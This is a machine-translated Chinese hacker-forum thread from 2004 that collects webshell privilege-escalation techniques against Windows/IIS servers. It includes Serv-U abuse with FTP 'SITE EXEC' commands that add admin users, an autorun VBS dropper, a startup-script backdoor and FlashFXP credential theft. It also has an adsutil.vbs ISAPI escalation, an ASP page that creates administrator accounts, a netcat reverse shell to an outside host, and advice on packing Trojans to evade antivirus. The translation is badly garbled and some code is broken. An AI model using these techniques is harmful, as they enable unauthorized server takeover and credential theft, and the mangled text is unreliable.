2. Tech
  3. About ASP Trojans improved permissions

About ASP Trojans improved permissions

xiaoxiao2021-03-06  16

source:

http://www.17nc.com/

Now the ASP Trojan is flying, I have been in turn, I found it used more than 30 ASP Trojans. After the help administrator cleaned up, it was really tired. Think about the administrator is really lazy ...

After uploading the ASP Trojan, if you just modify the home page, or delete files, then you don't have to upgrade the permissions. If you don't want to black, there is an ASP Trojan, there is no use, and you will put a temporary file.啥, and many web servers usually only give you the right to browse the website directory, even the C drive can see, let alone the permissions and perform Trojans.

There are many ways to improve the permissions, but I haven't found an universal method. I can't upgrade the permissions, and there is too much relationship with the website settings. Now I will organize it. I hope that one day will have an universal method. Tell me!

But then, the website is even more difficult, hehe ...

This post has been edited by the author at 2004-12-25 20:53:58]

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 19:49:19

-

WebShell permission

Online the online leakage, I believe everyone will take a lot of broilers, but they are all Webshell, can not get system authority, how do you get system authority? This is exactly what we have to discuss this time.

OK, enter my webhell

Ah, good, double CPU, speed should be followed, don't take you, how do you will be willing?

Enter your password, go to see, there is no good thing, turn it off, it seems that there is no special thing, see if you can't go to other drive characters, point the C disk, not bad, you can go in, This improves this.

SERV-U upgrade

OK, look at what procedures in his programe, oh, there are serv-u, remember to see the Serv-U has a default username and password, but the number of listeners is 43958, but it is only local to access, but We have port forwarding tools, not afraid. Let's see how much his Serv-U is, telnet xxx.xxx.xxx.xxx 21

The display is actually 3.0, hehe, have to say that this administrator is really unknown. Later, I was scanned, and only FTP's hole did not make up. Since this is the case, we start our upgrading permissions.

Upload fpipe, port forwarding tool, Figure three

Enter d: //wwwroot//fpipe.exe -v -l 81 -r 43958 127.0.0.1, meaning the 43598 port of this unit to 81 port

Then open the serv-u, click Serv-U server on our own machine, click the server on the menu bar, click the new server, then enter the IP, enter the port, and remember that the port is the 81 port we just forwarded. The service name is just like, how do you do it. Then you name the username: Localadministrator Password: #L@ or @P (password is a letter)

Determine, then click the server just built, then you can see existing users, create a new user, plus all permissions. Nor lock root directory

The next is to log in, the landing FTP must be logged in under CMD, after entering the general command, the same time, add the user

FTP> Quote Site EXEC NET.EXE User HK Pass / Add

FTP> Quote Site Exec Net.exe Localgroup Administrators HK / Add

If the other party has opened 3389, don't teach you how to do it. If you don't open, the new IPC connection is created, and the Trojan or the 3389 tool is opened.

two

Auto.ini plus shell.vbs

Autorun.inf

[autorun]

Open = shell.vbs

Shell.vbs

DIM WSH

SET WSH = CreateObject ("wscript.shell")

Wsh.run "Net User Guest / Active: Yes", 0

Wsh.Run "Net User Guest 520LS", 0

wsh.run "Net localgroup administrators guest / add", 0

Wsh.Run "Net User HKBME 520LS / Add", 0

Wsh.run "Net localgroup administrators hkbme / add", 0

Wsh.Run "cmd.exe / c del autorun.inf", 0

wsh.run "cmd.exe / c del shell.vbs", 0

But so you can access the root directory of the other party. Put these two files into the root of the other's hard drive. Of course, you can also perform Trojans directly, but also a Trojan, but the statement is the same as the last two sentences, perform Trojans through CMD

three

Folder.htt with Desktop.ini

Folder.htt will be rewritten with Desktop.ini, and your Trojan or VBS or what is the most likely browsing of the other party, I feel that it is not enough, you can put more a few more

Folder.htt Add code

However, the back door and these two files must be put into one, a little problem, can start the VBS, after running, delete uploaded lattime. It is codebase = "shell.vbs" .shell Writing

four

Replace

Alternative method, you can replace the file being executed. It is almost possible to get permissions immediately, but I have not done it, I can try it, replace the files that the other party being executed is the same as the file name, bundled Trojan. Why don't you replace the Trojan? If you replace a key program, don't you hang it directly? So still bundle

format

Replace [Drive1:] [Path1] FileName [Drive2:] [Path2] [/ A]

[/ R] [/ w]

Replace [Drive1:] [PATH1] FileName [Drive2:] [PATH2]

[/ R] [/ s] [/ w]

[Drive1:] [Path1] FileName Specifies the source file.

[Drive2: [PATH2] Specifies to replace files

table of Contents.

/ A Add a new file to the target directory. Cannot and

/ S or / u Command line switch is used.

/ P Replace your file or join the source file before prompted you

Undergo verification.

/ R Replace the read-only file and unprotected files.

/ S Replace the file of all subdirectories in the target directory.

Can't communicate with / a command options

For use with.

/ W Waiting for you to run again after inserting the disk.

/ U will only replace or update files that have previously earlier than source files.

Can't use with / a command line switch

This command has not been trial, see the files under the folder that cannot be accessed, everyone can test

Fives

script

Write a boot / shutdown script configuration file Scripts.ini, this file name is fixed and cannot be changed. The content is as follows:

[Startup]

0cmdline = a.bat

0Parameters =

Save the file Scripts.ini to "C: // WinNT // System32 // GroupPolicy // Machine // Scripts"

A.BAT content can be Net User Yonghu Mima

Can also be NET User Administrator XXX

This can restore the password you want to have any user name, you can also add new users, but to rely on reboot, there is a writable for System32.

six

Sam

If you can access the other party's SYSTEM32, remove the other party's SAM file, wait for him to restart, the admin user password is empty.

Suddenly, I have an idea, can I replace it with the replace command, you can extract your SAM file and upload it to any of his reputation, and then replace it. But I don't know if I have no permissions to System32, I can replace it.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 19:51:04

-

Using FlashFXP to improve the permissions recently got a lot of broilers :) Some people are too busy, everyone's method is just the use of the back door of the ASP script. As for the issue of promoting the power, few people can do one breath. The key is to do a problem on the improvement permissions, and many of the server settings are very bt, your ASP Troja may not be used, but also the improvement there. We get WebShell is the authority of a low-level user. Various improved permissions method is to be described as five flowers. How to improve your own tricks.

First, if there is a PCANYWHERE server installed on the server, the administrator has given us convenient to facilitate management, and the Documents and Settings / All Users / Application Data / Symantec / Pcanywhere / Symantec / Pcanywhere / Symantec / PcAnywhere crack Use the PCANywhere connection to OK.

Second, if the other party has SERV-U, don't marry me, by modifying servudaemon.ini and fpipe, this software improvement should not be a question.

Third, through replacement system services to improve.

Its four, finding the documentation of CONN and Config to see if SA or MySQL's related password may be harvested.

I found this method in a boring intrusion, using FlashFXP to improve the permissions, but the success rate is high, see your own luck :)

I got a WebShell through BBS at www.xxx.com, put a pony (now the famousah's name is too big, I don't dare to put a piece of code into n files, black. The improvement permissions don't have time. After I went home, I saw that I was halo BBS upgrade to the mobile network SP2, I put the pony was also K, and the BBS of others was Access version. Depressed! Suddenly remembered that I insert a page into the back door of the ASP and see if there is still hope. Enter www.xxx.com/xx.asp?id = 1 good guy, still! Happy ING Figure 1

So I uploaded an ASP's latter, how to improve permissions?

On the host of this website, I wandered N minutes, found a flashfxp folder under C: // Program Files (using this software as yourself like me) Figure 2, then I have already hit Sites. DAT this file ( Edit) This is something password and user name, and the password is addressed.

If I put these files back to the local location, how about it? Replace my local corresponding file?

So I downloaded the Sites.Dat Sites.Dat.bak Stats.dat Stats.dat.bak Download several files to my computer replaced the corresponding file of the FlashFXP folder in my computer. Open FlashFXP Open the site manager in the site.乖 乖 发

The other sources are in Figure 3 through the various sites connected to the FlashFXP connection. Through us, we have a bunch of broilers, we have FTP privileges. Upload script Trojans ~ huh, huh.

Talking about this for a long time, this improved permissions did not speak.

Don't worry, everyone look at the site manager of the other party, has the username and password, the password is an asterisk. what a pity!

Also think of the password and user name in sites.dat, and the password is encrypted.

Now the start of the star is also adding secrets. Look, you will go.

How to see? The rookie has a good look at the software, which is the XP asterisk Password viewer, and compares the password by viewing Sites.dat. The comparison of Figure 4 and Figure 5 is obvious that the password as seen in the site manager is displayed in plaintext. Make a fortune

The next step is to use the XP asterisk Password viewer to extract passwords and usernames. The complex password of the viewer is really a little missing the time of playing SNIFF. Ha ha

The password is: b69ujkq6 Hyndai790 S584P * FV4-C 98CQ3JK4 3-8 * EF. / 2Z5

Username: BN7865T Nilei75 QM / -G57 3KN QM / -G57 3KN 5.e * 82 / 69

(The above password and username have been necessary to modify)

So much information, according to the concept of social engineering, there is no administrator's password. I don't believe it. In the end, I got the password of this website administrator from this pile.

I think this question should be fed back to FlashFXP official, let them correct this vulnerability or error in the next release. After later testing, simply replace the SITES.DAT file containing the password and the username to the local corresponding file, you can restore the password of each site of the other party. I hope that when you encounter Fla SHFXP, you can think of this method, at least a pile of new broilers. Do not prevent try? I hope to give us help.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 19:52:16

-

Remind the ASP permission to the highest by: cnqing from:

http://friend.91eb.com

Originally, I would like to write a proprietary ASP Trojan. Unfortunately, the time is not too much skill. Let me tell you the principle method first. Simply talk about it, there is no need to say too much. I understand it. principle:

Asp files are running by ASP.DLL. Started by dllhost.exe. The identity is IWAN_NAME. If you put asp.dll in InProcesslsapiapps, it is started directly by inetifo.exe. Identity is System

method:

first step.

Get the contents of InProcesslsapiapps, with the command "CScript C: //inetpub//adminscripts//adsutil.vbs Get W3SVC / Inprocessisapiapps". A set of DLLs will be copied.

Second step

Write a BAT content for "CScript c: // inetpub // adminScripts // adsutil VBS set w3svc / inprpocessisapiapps" c: //inetpub//adminscripts//asp.dll "····

The omitted content is copied. Do not bring back the car with spaces

Finally, run this BAT.

E.g:

I have obtained with "CScript C: //inetpub//adminscripts//adsutil.vbs get w3svc / inprocessisapiapps"

"c: //winnt//system32//inetsrv/httpext.dll"

"C: //winnt//system32//inetsrv/httpodbc.dll"

"C: //winnt//system32//inetsrv//ssinc.dll"

"C: //winnt//system32//msw3prt.dll"

"C: // Program files // Common files // Microsoft Shared // Web Server Extensions // Isapi // VTI_AUT // Author.dll"

"C: // program files // common files // microsoft shared // web server extensions // isapi // vTI_adm // admin.dll"

"C: // program files // Common files // microsoft shared // Web server extensions // isapi // shtml.dll"

Then your BAT should be:

Cscript c: // inetpub // adminScripts // adsutil VBS set w3svc / inprpocessisapiapps "c: //inetpub//adminscripts//asp.dll" C: //winnt//system32/inetsrv//httpext.dll " "c: //winnt//system32/inetsrv/Httpodbc.dll" "c: //winnt/system32//inetsrv//ssinc.dll" "C: //winnt/system32//msw3prt.dll "" C: // Program Files // Common Files // Microsoft Shared // Web Server Extensions // ISAPI / / VTI_AUT // Author.dll "C: // Program Files // Common Files // Microsoft Shared //// Web server extensions // isapi // vti_adm // admin.dll "C: // Program files // common files // microsoft shared // Web server extensions // isapi // shtml.dll" has been tested! !

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 19:53:18

-

By using% 5C to bypass the verification

By using% 5C to bypass the verification

---------------------------------------

Lake2

http://mrhupo.126.com)

2004-11-27

---------------------------------------

Speaking of% 5c, do you think of the current popular% 5C branches, huh, this article is an exploration of% 5C (Oh, of course, there is a new stuff I proposed, maybe it is helpful to you ^ _ _ ^).

Ok, let's chase the roots, find the old bottom of the vulnerability. Look at the vulnerability announcement of the Great League 2001:

http://www.nsfocus.net/index.php?ac...iew&bug_id=1429

N years ago, this vulnerability can be used to realize the directory traversal, although Microsoft has a patch, but it seems that the patch is used to limit IIS to only access the virtual directory, so the vulnerability is still existed, but it is only available. For IIS, submit a URL containing% 5C to find files, but other files referenced in the file are not found (% 5c is //'s URL encoding, IIS jumps to the previous directory) Find, of course, can't find; dizziness, haha, I am dizzy).

Later, this vulnerability was excavated by the cattle, but also the legendary 5C branches: due to the relative path of the file references to the database, submit% 5C can't find the file, so IIS will be old and old. Path of the database (do not understand? Looking for Google).

An accidental opportunity I found that you can also use% 5C to bypass the ASP verification; try it when we fails in the branches.

Stapless, look at the following code:

<%

Guest_user = trim (Request ("Guest_USER"))

Guest_password = trim (Request ("Guest_password"))

SET RS = Server.createObject ("AdoDb.Recordset")

SQL = "SELECT * from admin where id = 1"

RS.Open SQL, CONN, 3, 2

Readuser = RS ("Guest_USER")

Readpassword = rs ("Guest_password")

IF readuser <> guest_user or readpassword <> guest_password kil

Response.write "Please enter the correct administrator password!"

Response.end

Else

Session ("admin") = 1 / 'After logging in, write Seesion Save

Response.write ("Successful landing, please return the information page")

END IF

%>

Seeing that there is no, if you want to verify that you must make the username password in the database and submit; what? Let's take a look at the database connection file code:

<%

ON Error ResMe next

Set conn = server.createObject ("adoDb.connection")

Dbpath = server.mappath ("Guestbook.asp")

Conn.open "Driver = {Microsoft Access Driver (* .mdb)}; dbq =" & dbpath

%>

Ah, there is a fault-tolerant statement that cannot be treasure! Wait, if the submission% 5C database can't be found, due to fault, the program will continue, then the username password you get from the database is empty (thinking that sometimes the branches fail is to see the empty frame, because The data is empty), haha, so we will bypass the verification!

Know how to do it, save the landing page to the local, modify the submitted URL, put the last / change to% 5c, username password space (some programs check if the username password is empty, space will be filtered by the program ), Submit, OK.

Hey, you don't think that I have nothing to write to the code. In fact, this is a message board program made by our school, just hanging at the home page of the school, huh, huh.

Since understanding the principles, of course, I have to find the actual vulnerability, naturally the "hole" network forum opened by the famous name. But there is a failure because it has such a paragraph:

IF Err THEN

Err.clear

Set conn = Nothing

Response.write "Database connection error, please check the connection string."

Response.end

END IF

The database is not found, huh, huh, empty.

Then go to Down's BBSXP Forum, open the database connection file, halo, there is no tolerant statement; huh, but you can burn.

I am not BT, so I don't look for it, write articles, I will give you a master. Summarize this condition for this attack method: 1. The relative path for database connection is only a simple fault-tolerant statement; 2. Server IIS version is 4 or 5; 3. If you do not check empty characters or check, filter spaces Filter spaces during comparison; 4, the program cannot be in the first class

As for the prevention, huh, since the attack conditions know, the prevention measures have naturally come out ^ _ ^

-------------------------------------------------- ------------------------------

- Author: vjoy

- Published: 2004-12-25 19:57:36

-

Add a super user's .asp code [blue screen original, Kevin improvement, MS unpublished vulnerability]

Author: blue, Kevin Source: freezing limit

In fact, the last week and Kevin were tested on my broiler, as well as the Hippo epic. The result is a user who successfully added the Administrators group under User permission (although I can't believe my eyes).

The last time Kevin did not speak, I didn't dare to release it .... Now I have seen him on his blog, it turns back (it has also improved a little more than I last test, add a form) Everyone has a blessing `` `

Anyway code is right, but very few can succeed, take advantage of luck. . Oh, the next step I want to integrate him into the ocean.嘿嘿.

.Network object script permissions Lifting Vulnerability Utilization Tool

User:

Password:

<% @ codepage = 936

ON Error ResMe next

If Request.ServerVariables ("remote_addr") <> "127.0.0.1" THEN

Response.write "IP! S N0T Right"

Else

IF Request ("UserName") <> "" "

UserName = Request ("UserName")

PASSWD = Request ("passwd")

Response.expires = 0

Session.Timeout = 50

Server.scripttimeout = 3000

Set lp = server.createObject ("wscript.network")

Oz = "Winnt: //" & lp.computername

Set ob = GetObject (oz)

Set oe = getObject (oz & "/ administrators, group")

Set = obs.create ("User", Username)

Od.setPassword Passwd

Od.setInfo

OE.Add Oz & "& UserNameif Err THEN

Response.write "~~ Don't buy 6 1 today ... 2 yuan to buy a bottle can be happy ..."

Else

IF INSTR ("Wscript.Shell"). EXEC ("cmd.exe / c net user" & username.stdout.readall, "Last Login"> 0 THEN

"Although there is no mistake, it seems that it is not established. You must be very depressed."

Else

Response.write "OMG!" & Username & "account is actually become! This is an unknown vulnerability. 5,000,000RMB is your" "

END IF

END IF

Else

Response.write "Please enter the user name"

END IF

END IF

%>

How to bypass firewall promotion rights

This paper is the focus of WebShell privileges and bypass firewalls.

If you talk nonsense, let's enter the topic.

First determine the goal:

Http://www.sun**.com, common virtual hosts. Using Upfile's vulnerability I believe that everyone gets WebShell is not difficult. We won this WebShell this time, not DVBBS, but the software upload filtration of free power 3.6 is not strict. website

http://www.sun**.com/lemon/index.asp is a free power 3.6 article system. XR uses WinHex.exe and WSockexpert.exe to upload a webpage Trojan Newmm.asp, people with Door.exe with over-action sharks know that this is to upload an ASP Trojan content. So, upload the ocean 2005a, successfully obtained WebShell.

Test the permissions, run SET in CMD, get some information of the host, the system disk is a D disk, and the WebShell has run permission. Then let's see what C is there? Is it a dual system? After browsing, there is no system file, only some junk files, fainting. It doesn't matter, check again, the virtual host has Serv-U, this is no exception, it is 5.0.0.8. Oh, there is a local spilled, dighara.

Idea: Uploading the Serv-U local overflow file Srv.exe and Nc.exe utilize NC to reverse the connection to obtain the system shell. Everyone finds that the components uploaded by the ocean 2005a are not easy (anyway, I always encounter this problem), there is no relationship, use Rain to upload a component, a total of 3 files, Up.htm, Upload.asp and UploadClass. ASP. UPLOAD.ASP and UPLOADCLASS.ASP upload to the same folder, up.htm is locally used, modify the link address in the Up.htm:

http://www.sun**.com/lemon/UPLOAD.ASP can be uploaded.

After Srv.exe and Nc.exe were found after h: // long // suwing *** // Lemon (website directory), found that there was no run permission. It doesn't matter, depending on the experience, the general system D: // Documents and settings // all users // should have operational permissions. So I want to pass the file Copy, but I found that our WebShell did not write permission to the D disk, fainted.

You can browse D: // program files // serv-u // servudaemon.ini, you can't change it, do you want to crack the password of Serv-U, halo, don't want it. It is not possible to discharge it, I suddenly thought of why the system was not placed in the C drive, is the C disk is a FAT32 partition? (Later proved our ideas. Here, if the host has a Win98 system disk, 99% is the FAT32 partition. We have also encountered a host with ghost, in order to back up in DOS, its backup disk It is generally a FAT partition.) If the system disk is a FAT32 partition, the website has no security. Although the C disc is not a system disk, we have execution permission. Oh, copy srv.exe and nc.exe to C: //, run srv.exe "nc.exe -e cmd.exe 202. *. *. * 888", here 202. *. * Is us The broiler, before this, we have run NC-L -P 888 on broiler. We are in the online network, no public IP, unhappy -ing.

We successfully won a system shell even on the broiler. (It seems simple. In fact, we have also encountered setbacks. We found that some version of NC actually no -e, but also thought that the world NC function is the same. Later, I found that different versions of NC interconnects are unsuccessful, will appear Into the garbled, there is no way. To this end, upload N times, wrong N times, silly N times, and finally succeeded. Be a hacker really has patience and perseverance.)

If you are happy, we are still not satisfied because this shell is too slow. So, I want to use our most common RADMIN, in fact, the administrator can press Alt Ctrl Del to see the process can find R_Server, but I still like to use it because it will not be killed. Ok, upload Admdll.dll, Raddrv.dll, r_server.exe to h: // long // sun *** // Lemon, use the shell who got the NC to put them Copy to D: // WinNT // System32 // Under, run: r_server / install, net start r_server, r_server / pass: ras / save.

A long wait, finally showed success. The ramp is used to connect with RADMIN and find the connection failure. Dizzy, forgot to have a firewall. Upload PSLIST and PSKILL, found with backice, wooden mock, etc. Kill, although they can be logged in, but the server is still not on, it is not a long time. The firewall is a port that does not prevent 21, 80, so our ideas returns to the Serv-U. Download his servudaemon.ini, cover the machine's servudaemon.ini, add a user name XR, password to the RAIN, plus all permissions on the serv-u of this unit. Use the old way, upload, write to D: // program files // serv-u //, override the original servudaemon.ini. Although I waited for N for a long time, it was successful, so I used FlashFXP, and 530 errors occurred. Depressed, how to fail. (It should be possible according to experience, but why not don't want to talk, please guidance.)

Whether, we restart the serv-u is OK, how to restart, start to use the shutdown to restart the system, but we lose the NC shell, and may also be discovered. Later, the eyes were bright, don't we have PSKILL? I have found this process with PSLIST: Servudaemon. Take it Kill. Then run D: // Program files // serv-u // servuadmin.exe, here should be noted not servudaemon.exe. Ok, let's go here, let's go directly, LS, haha, the system is in my master. Can we run the system command? Yes, this is possible:

FTP> Quote Site EXEC NET USER XR RAIN / ADD

Running Net User on WebShell, you can see that it is successful.

The entire invasion penetrates this, and after a while, after a while, after a while, after a while. We started discussions. In fact, breaking through the firewall has a lot of good rootkit, but we feel that the service comes with the safest lattime.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:35:14

-

Asp.dll parsing into system upgrade permissions

There are two kinds of traditional upgrades on the network:

1. Under graphics, put the default site ---> Home directory ---> Application Protection Set to low, so you can set the ASP permissions to System.

However, this improvement method is easily discovered, so there is another network there is generally used adsutil.vbs to improve permissions. And this is today

I have to talk about Adsutil.vbs to improve permissions.

2. Fact it with Adsutil.vbs.

I saw a lot of animation, articles that teach you this method, but I didn't see the principle of introduction, let me talk about my personal opinion:

First give an example:

There is a group of dogs, and this group of dogs have a few old-fashioned dogs, they have supreme privileges, while other dogs, their permissions are less pitiful.

Go to the computer:

In IIS, there are several DLL files that have privileges. We can understand that system privileges are like a long-scale dog. The asp.dll of the ASP is like a

Ordinary dog, his permissions are so powerful.

So, if the asp.dll has become a long-scale dog, then the ASP does not have system authority, which is ready. So our ideas are

Add asp.dll to the privileged DLL family. The promotion step is:

<1> See what privileges are privileged.

<2> Add asp.dll to join the privilege

Ok, let's practice this process.

1) View the DLL file with privileges:

Command is: cscript adsutil.vbs Get / W3SVC / Inprocessisapiapps

Get shown as:

C: // inetpub // adminScripts> CScript Adsutil.vbs Get / W3SVC / Inprocessisapiapps

Microsoft (R) Windows Script Host Version 5.1 for Windows

Copyright (c) Microsoft Corporation 1996-1999. All Rights Reserved.

Inprocessisapiapps: (List) (5 items)

"C: //winnt//system32//idq.dll"

"C: //winnt//system32//inetsrv/httpext.dll"

"C: //winnt//system32//inetsrv/httpodbc.dll"

"C: //winnt//system32//inetsrv//ssinc.dll" "c: //winnt/system32//msw3prt.dll"

Seeing that there is no, he explains that there is a privilege family as: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

These documents, different machines may be different.

2) Add asp.dll to the privileged family:

Because asp.dll is placed in c: //winnt//system32//inetsrv//asp.dll (the location of different machine places is not necessarily the same)

We now add CScript Adsutil.vbs SET / W3SVC / InProcessisapiapps "C: //winnt//system32//iDQ.dll" "c: //winnt//system32/ -/inetsrv//httpext.dll" C: / /Winnt//system32//inetsrv/Httpodbc.dll "C: //winnt//system32//inetsrv/sinc.dll" "c: //winnt//system32//msw3prt.dll" C: //winnt//system32//inetsrv//asp.dll "

Ok, now you can use the cscript adsutil.vbs get / w3svc / inprocessisapiapps to see if it is added.

, Pay attention, get and set in the usage, one is to view one is setting. There is also the directory you want to go to C: // inetpub // adminsscripts>.

So if you are an administrator, your machine is used to use this trick to upgrade the ASP to System permissions, then, the method of preventing the ASP.DLL T is a privilege, which is to use the set of this command, overwrite Those stuff just now.

Example: CScript Adsutil.vbs SET / W3SVC / INPROCESSISAPIAPPS "C: //winnt//system32//idq.dll" "c: //winnt//system32//inetsrv//ttpext.dll" C: // Winnt //system32//inetsrv//httpodbc.dll "" c: //winnt//system32//inetsrv//ssinc.dll "" c: //winnt//system32/msw3prt.dll "

This is okay, when you use CScript Adsutil.vbs Get / W3SVC / InProcessisapiapps, if you have not seen asp.dll,

Note, the permissions of the ASP return to previous permissions.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Published: 2004-12-25 20:41:06

-

Winnt / 2000 upgrade permissions

WINDOWS NT / 2000 universal improvement method

Attackers usually increase their permissions to the administrator group after obtaining system certain access rights, so that the attacker controls the computer system. This has the following methods: 1. Get the administrator password, next time you can use this password to enter the system; first create a user, then add this normal addition to the administrator group, or simply directly put an opacity Users are added to the administrator group such as GUEST; 3. Install the back door.

This paper briefly describes how to improve privileges commonly used in Windows NT4 and Windows 2000 attackers. Below is a specific method:

Method 1: Download the system's% WINDIR% // REPAIR // sam. * (WinNT 4 is Sam._ and Windows 2000 is SAM) file, then use L0PHT and other software to crack, as long as you can get, Kenhua time, It must be cracked. Question: (1) The attacker does not necessarily access the file (see the attacker's identity and administrator settings); (2) This file is a list of accounts when the last system backup (or the first system installation is If you change your account password, it is useless.

Method 2: Using PWDUMP (L0PHT, Windows 2000 is invalid) or PWDUMP2, obtain the current user list and password encrypted list, and then crack this list with L0PHT.

Question: Ordinary users cannot successfully run the PWDUMP class program (no permissions), such as the IUSR_Computer identity when using the Unicode vulnerability to enter the system, which is generally only on the guests group, and running the PWDUMP class will fail.

(The above two are offline)

Method 3: Remote cracking and guessing using enum and other programs. ENUM can use a specified dictionary to crack a user of a remote host.

Question: (1) If the system sets the account lock, crack a few times, the account is locked, temporarily can't be broken; (2) To open the NetBIOS connection remote system, it is the 139 port of TCP, if the firewall is filtered If Enum cannot be connected to the host.

(The above method is to obtain a password by cracking, and there is a way to upgrade the current user to the administrator group directly.)

Method 4: GetMin (under WinNT 4), PipeUpadmin (under Windows 2000), run the current user account to the administrator group in this unit. PipeUpadmin is relatively powerful, and ordinary users and guests users can run successfully.

Question: GetMin has fixed fixed in SP4, which cannot be used for Winnt 4 systems above SP4. Of course, there is a GetMin enhancement version, but it seems that it does not run successfully in SP6A.

Note: This method uses the security vulnerability of Winnt 4 systems to install patch resolution.

(In addition, there is also a way to communicate.)

Method 5: Specify user shell program (Explorer.exe) in WinNT 4 and Windows 2000 registry

There is no absolute path, but use a file name of a relative path (considered compatibility issues).

Since the search order problem of the system startup program makes% SystemDrive% // Explorer.exe executes, this provides an attacker a chance to execute him when the user is next time you log in. Your own procedure.

Question: An attacker must have the write permission to install the system logic with the directory, and the general administrator sets the directory ordinary user forbidden.

Note: This method uses security vulnerabilities for Winnt 4 / Windows 2000 systems to install patch resolution.

Method 6: Trojan: Upload Trojans, then run the Trojan, after the system is restarted, the Trojan is the identity of the local login user, and then the attacker is connected to the user's permissions. Because it is generally always an administrator local login system, this is likely to obtain administrator's permissions. Question: (1) Anti-virus software or virus firewall may prevent Trojans from running, and it is possible to kill Trojans.

(2) Some Trojans cannot run in the guest group identity, which may be related to the way it is automatically running; if there is no authority to rewrite the automatic running position of the registry, you cannot write% system% // system32 directory (general Trojan All change the file name, then write to the system directory. If there is no write to the permission system directory, you can't successfully execute the Trojan).

Solve: However, also useful compression programs (not the usual compression program, this compression program is compressed, but the file is smaller, but it can still be properly executed) to compress the Trojan, thus escape the characterization of anti-virus software . I used Aspack to successfully compressed a Trojan, escaped Jinshan's official version of the official version. However, some Trojans Aspack can't compress, such as the ice.

Method 7: Gina, Ginastub Trojan. Although this is also called Trojans, its function is very different from the upper side, because the general Trojan is installed on the other party, once run, you can use the Client to connect to the Server side, and operate. Ginastub generally has only one dynamic connection library file, which needs to be manually installed and uninstalled. His function is not using the Client side to control the Server end, which is just capturing the user's login password.

Question: It is more troublesome to install, the possibility of success is low, and improper installation will cause the installed system that cannot be started.

Note: This method is not the system's security vulnerability, so this problem cannot be solved by installing a patch. For Gina, you can see another article "Winlogon Login Management and Gina Introduction"

Method 8: Local overflow. Buffer overflow is the best way to attack, because system privileges or administrator privileges can generally be obtained; but many remote overflow attacks do not need prior to executing programs, and local overflow just right to improve privileges. Win NT4's IIS4 ASP extension has a local overflow vulnerability, and Windows 2000 still image service also has an overflow vulnerability, using this vulnerability, an attacker can get system authority. Of course, Windows NT and Windows 2000 have many programs have overflow vulnerabilities, which is not always running, so the possibility of being utilized is relatively small.

Question: (1) ASP extended overflow vulnerability requires an attacker to write permission to the script directory of the website, in order to put the attack program on the website, and then execute.

(2) Static image service is default, which is automatically installed when the user installs still image devices (such as digital cameras, scanners, etc.) on Windows 2000.

Note: This method uses security vulnerabilities for Winnt 4 / Windows 2000 systems to install patch resolution.

Windows 2000 Special Lifting Vulnerability Method 1: Windows 2000 input method vulnerability, using this vulnerability anyone can execute the program as a localsystem, so that this vulnerability is generally limited to people who have been physically touching Windows 2000 computer. Of course, if the terminal service is opened, the attacker can also use the vulnerability remotely.

Note: This method uses the security vulnerability of the Windows 2000 system to install the patch to solve this problem.

Method 2: Using Windows 2000 NetWork DDE DSDM Services Vulnerability Ordinary User You can perform any program as Localsystem, you can change your password, add users, etc. Guests group users can also successfully utilize the vulnerability.

Question: This service is not started by default, you need to start this service.

Note: This method uses the security vulnerability of the Windows 2000 system to install the patch to solve this problem.

Method 3: When the Windows 2000 Telnet service process is established, the service creates a named pipe and uses it to execute the command. However, the name of the pipe can be foreseen. If Telnet finds an existing pipe name, it will use it directly. An attacker uses this vulnerability to build a pipe name in advance. When the next Telnet creates a service process, the attacker code will be run in the local system environment.

Note: This method uses the security vulnerability of the Windows 2000 system to install the patch to solve this problem.

Method 4: Windows 2K There is a vulnerability that uses Debug Registers promoted permissions. If an attacker runs a program in Win2K, use this vulnerability, he can at least take the right to write to% windir% // system32 and registry HKCR. Because X86 Debug Registers DR0-7 is global shared for all processes, the hardware breakpoint is set in a process, which will affect other processes and services.

Note: This method takes advantage of the security vulnerability of Windows 2000 systems, but Microsoft still has no patches can be installed, but the vulnerability attack program has appeared, so it can only block the attacker's entry to prevent the use of this vulnerability.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:47:03

- Smartly with the ASP Trojan to get the background of the background management rights (this is a classic ... I haven't said it "

Coincidentally with the ASP Trojan to get the background of the background management rights (this is a classic ... I realized that I have said it)

Author: aweige from: Chinese hackers Red Army

Subject to the disaster network forums Upload vulnerabilities and recently opened the upload vulnerabilities of various ASP systems exposed two-year-old ASP system, there may be many friends with a lot of Webshell broilers, as for the way of doing these chicks varies from person to person. Some people continue to enhance permission, further invasion, and some people just look at it, the horse has been in the past, there are some friends, when Webshell's freshness has passed the mystery and temptation of the background. In fact, for many powerful systems, I get a good back door, huh, huh, huh .......... But now a new version is a lot of ASP system passwords. MD5 encryption then cooperates with a strict verification program to verify, but will we do not break through these limitations? NO! I am going to say how to break through these restrictions, let us go straight, there is a good thing, FOLLOW

ME ..........

Session spoof

First, please simply say the principle of authentication of the general ASP system.

In general, the background administrator enters the account password in the login page, and the program will look for the user's name password to the database. If you have this person's account password, you think you are an administrator, then give You a session value that represents your identity. Or the program first extract your username password, then remove the administrator's account password in the database's administrator table to compare the comparison you submitted. If it is equal, give you the SESION value indicating your identity. . Then you enter any of the management page, you must first verify your session value. If you are an administrator, let you pass, if you guide you back to the login page or some Qiqi warning, these are with the programmer Personal preferences are related. I know the principle, our current idea is to modify its procedure through our ASP Trojan and get a administrator session, so that we don't have administrator passwords, but we have never blocked in the background. I called this method as session spoof. It is limited to the space that can not be described in detail in each system. This article is only described as an example of a dynamic article system.

Power Article System 3.51, (Figure 1)

Figure one

In fact, all the versions of the dynamic article system are all killing, including easy accessibility. Everyone can practice itself.

Let's take a look at its verification content. Power Article 3.51 Verification page in admin_chklogin.asp

The verification content is as follows:

..........

Else

RS ("LastLoginip" = Request.ServerVariables ("remote_addr")

RS ("LastLogintime") = now ()

RS ("Logintimes") = rs ("logintimes") 1

Rs.Update

Session.Timeout = sessionTimeout

Session ("adminName") = RS ("UserName")

Rs.close

SET RS = Nothing

Call CloseConn ()

Response.Redirect "admin_index.asp"

The forefooting number is verified by the username password, until Else, look, if the username password is correct to give you two session values:

Session.Timeout = sessionTimeout

Session ("adminName") = RS ("UserName")

Let's take a look at how other management pages verify session, and admin_index.asp is just like this:
